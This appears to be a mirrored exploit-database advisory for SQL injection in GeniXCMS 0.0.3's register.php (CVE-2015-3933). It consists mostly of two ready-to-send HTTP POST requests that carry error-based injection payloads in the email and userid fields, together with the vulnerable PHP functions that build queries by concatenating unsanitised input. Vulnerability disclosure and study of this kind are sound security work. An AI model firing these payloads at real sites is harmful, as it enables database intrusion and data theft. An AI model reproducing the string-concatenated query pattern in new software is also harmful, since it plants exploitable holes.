Home / exploitsPDF  

GeniXCMS 0.0.3 SQL Injection

Posted on 27 June 2015

# Exploit Title: Genixcms register.php multiple SQL vuln
# Date: 2015-06-23
# Exploit Author: cfreer (poc-lab)
# Vendor Homepage: http://www.genixcms.org
# Software Link:
https://codeload.github.com/semplon/GeniXCMS/zip/master/GeniXCMS-master.zip
# Version: 0.0.3
# Tested on: Apache/2.4.7 (Win32)
# CVE : CVE-2015-3933

=====================
SOFTWARE DESCRIPTION
=====================

Free and Opensource Content Management System, a new approach of simple and
lightweight CMS. Get a new experience of a fast and easy to modify CMS.

=============================
VULNERABILITY: SQL Injection
=============================

Poc:

1、Genixcms register.php email SQL vuln

HTTP Data Stream

POST /genixcms/register.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101
Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;
PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 199

email='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&pass1=cfreer&pass2=cfreer&register=1&token=&userid=poc-lab

inclibUser.class.php

public static function is_email($vars){
 if(isset($_GET['act']) && $_GET['act'] == 'edit'){
 $where = "AND `id` != '{$_GET['id']}' ";
 }else{
 $where = '';
 }
 $e = Db::result("SELECT * FROM `user` WHERE `email` = '{$vars}'
{$where}");
 if(Db::$num_rows > 0){
 return false;
 }else{
 return true;
 }
}

==============================================================================================================================================
2、Genixcms register.php userid SQL vuln

HTTP Data Stream

POST /genixcms/register.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101
Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;
PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 224

email=websec@poc-lab.org&pass1=poc-lab.org&pass2=poc-lab.org
&register=1&token=&userid='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'

inclibUser.class.php

public static function is_exist($user) {
if(isset($_GET['act']) && $_GET['act'] == 'edit'){
 $where = "AND `id` != '{$_GET['id']}' ";
 }else{
 $where = '';
 }
 $usr = Db::result("SELECT `userid` FROM `user` WHERE `userid` =
'{$user}' {$where} ");
 $n = Db::$num_rows;
 if($n > 0 ){
 return false;
 }else{
 return true;
 }

}

referer: https://www.exploit-db.com/exploits/37363/

 

TOP

Malware :

Exploits :